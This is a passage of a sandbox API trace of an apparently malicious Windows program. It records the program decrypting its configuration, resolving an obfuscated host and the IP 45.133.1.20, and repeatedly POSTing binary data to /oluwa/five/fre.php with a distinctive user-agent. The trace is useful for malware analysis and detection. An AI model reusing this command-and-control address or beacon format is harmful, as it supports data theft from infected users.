hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0212.683] GetProcessHeap () returned 0x6a0000 [0212.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0212.684] GetProcessHeap () returned 0x6a0000 [0212.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0212.685] GetProcessHeap () returned 0x6a0000 [0212.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0212.712] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x650) returned 0x5e4 [0212.716] Sleep (dwMilliseconds=0xea60) [0212.718] GetProcessHeap () returned 0x6a0000 [0212.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0212.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.719] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0212.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.734] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0212.741] GetProcessHeap () returned 0x6a0000 [0212.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0212.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.742] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0212.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.743] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0212.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.744] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.745] GetProcessHeap () returned 0x6a0000 [0212.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0212.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.749] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0212.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.750] CryptDestroyKey (hKey=0x6ad560) returned 1 [0212.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.750] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0212.750] GetProcessHeap () returned 0x6a0000 [0212.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0212.751] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.751] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0212.752] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.752] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0212.753] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.754] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0212.755] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.755] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0212.755] GetProcessHeap () returned 0x6a0000 [0212.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0212.755] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0212.758] GetProcessHeap () returned 0x6a0000 [0212.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0212.759] GetProcessHeap () returned 0x6a0000 [0212.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0212.759] GetProcessHeap () returned 0x6a0000 [0212.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0212.759] GetProcessHeap () returned 0x6a0000 [0212.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0212.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.760] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0212.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.766] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0212.775] GetProcessHeap () returned 0x6a0000 [0212.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0212.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.777] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0212.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.778] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0212.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.779] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.779] GetProcessHeap () returned 0x6a0000 [0212.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0212.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.780] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0212.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.781] CryptDestroyKey (hKey=0x6ad020) returned 1 [0212.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.782] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0212.782] GetProcessHeap () returned 0x6a0000 [0212.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0212.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.783] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0212.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.784] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0212.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.785] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0212.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.786] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0212.786] GetProcessHeap () returned 0x6a0000 [0212.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0212.786] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0212.786] GetProcessHeap () returned 0x6a0000 [0212.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0212.786] socket (af=2, type=1, protocol=6) returned 0x5e8 [0212.786] connect (s=0x5e8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0212.815] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0212.815] GetProcessHeap () returned 0x6a0000 [0212.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0212.815] GetProcessHeap () returned 0x6a0000 [0212.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4f18 [0212.816] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0212.817] wvsprintfA (in: param_1=0x6c4f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0212.817] GetProcessHeap () returned 0x6a0000 [0212.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0212.817] GetProcessHeap () returned 0x6a0000 [0212.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 [0212.818] GetProcessHeap () returned 0x6a0000 [0212.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0212.818] GetProcessHeap () returned 0x6a0000 [0212.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4f18 [0212.819] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0212.820] wvsprintfA (in: param_1=0x6c4f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0212.820] GetProcessHeap () returned 0x6a0000 [0212.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0212.820] GetProcessHeap () returned 0x6a0000 [0212.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 [0212.821] send (s=0x5e8, buf=0x6b5c98*, len=242, flags=0) returned 242 [0212.822] send (s=0x5e8, buf=0x6bb998*, len=159, flags=0) returned 159 [0212.822] GetProcessHeap () returned 0x6a0000 [0212.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 [0212.822] recv (in: s=0x5e8, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0212.897] GetProcessHeap () returned 0x6a0000 [0212.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0212.898] GetProcessHeap () returned 0x6a0000 [0212.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0212.898] GetProcessHeap () returned 0x6a0000 [0212.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0212.899] GetProcessHeap () returned 0x6a0000 [0212.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0212.899] closesocket (s=0x5e8) returned 0 [0212.900] GetProcessHeap () returned 0x6a0000 [0212.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0212.900] GetProcessHeap () returned 0x6a0000 [0212.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0212.901] GetProcessHeap () returned 0x6a0000 [0212.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0212.901] GetProcessHeap () returned 0x6a0000 [0212.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0212.902] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1328) returned 0x5e8 [0212.905] Sleep (dwMilliseconds=0xea60) [0212.907] GetProcessHeap () returned 0x6a0000 [0212.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0212.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.908] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0212.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.917] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0212.930] GetProcessHeap () returned 0x6a0000 [0212.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0212.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.931] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0212.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.932] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0212.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.933] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.933] GetProcessHeap () returned 0x6a0000 [0212.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0212.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.934] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0212.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.935] CryptDestroyKey (hKey=0x6ad020) returned 1 [0212.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.951] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0212.951] GetProcessHeap () returned 0x6a0000 [0212.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0212.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.952] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0212.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.953] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0212.953] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.954] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0212.954] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.954] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0212.954] GetProcessHeap () returned 0x6a0000 [0212.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0212.955] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0212.955] GetProcessHeap () returned 0x6a0000 [0212.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0212.955] GetProcessHeap () returned 0x6a0000 [0212.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0212.956] GetProcessHeap () returned 0x6a0000 [0212.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0212.956] GetProcessHeap () returned 0x6a0000 [0212.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0212.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.957] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0212.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.962] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0212.968] GetProcessHeap () returned 0x6a0000 [0212.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0212.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.972] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0212.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.972] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0212.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.973] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.973] GetProcessHeap () returned 0x6a0000 [0212.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0212.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.975] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0212.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.975] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0212.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.976] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0212.976] GetProcessHeap () returned 0x6a0000 [0212.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0212.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.977] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0212.978] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.978] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0212.979] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.979] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0212.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.982] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0212.982] GetProcessHeap () returned 0x6a0000 [0212.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0212.982] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0212.982] GetProcessHeap () returned 0x6a0000 [0212.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0212.982] socket (af=2, type=1, protocol=6) returned 0x5ec [0212.983] connect (s=0x5ec, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0213.025] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0213.025] GetProcessHeap () returned 0x6a0000 [0213.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0213.026] GetProcessHeap () returned 0x6a0000 [0213.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4f18 [0213.026] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0213.027] wvsprintfA (in: param_1=0x6c4f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0213.027] GetProcessHeap () returned 0x6a0000 [0213.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0213.027] GetProcessHeap () returned 0x6a0000 [0213.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 [0213.028] GetProcessHeap () returned 0x6a0000 [0213.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0213.028] GetProcessHeap () returned 0x6a0000 [0213.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4f18 [0213.029] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0213.030] wvsprintfA (in: param_1=0x6c4f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0213.030] GetProcessHeap () returned 0x6a0000 [0213.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0213.030] GetProcessHeap () returned 0x6a0000 [0213.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 [0213.031] send (s=0x5ec, buf=0x6b5c98*, len=242, flags=0) returned 242 [0213.032] send (s=0x5ec, buf=0x6bb998*, len=159, flags=0) returned 159 [0213.032] GetProcessHeap () returned 0x6a0000 [0213.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 [0213.032] recv (in: s=0x5ec, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0213.120] GetProcessHeap () returned 0x6a0000 [0213.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0213.121] GetProcessHeap () returned 0x6a0000 [0213.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0213.121] GetProcessHeap () returned 0x6a0000 [0213.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0213.122] GetProcessHeap () returned 0x6a0000 [0213.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0213.122] closesocket (s=0x5ec) returned 0 [0213.122] GetProcessHeap () returned 0x6a0000 [0213.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0213.122] GetProcessHeap () returned 0x6a0000 [0213.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0213.123] GetProcessHeap () returned 0x6a0000 [0213.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0213.123] GetProcessHeap () returned 0x6a0000 [0213.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0213.124] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x131c) returned 0x5ec [0213.126] Sleep (dwMilliseconds=0xea60) [0213.130] GetProcessHeap () returned 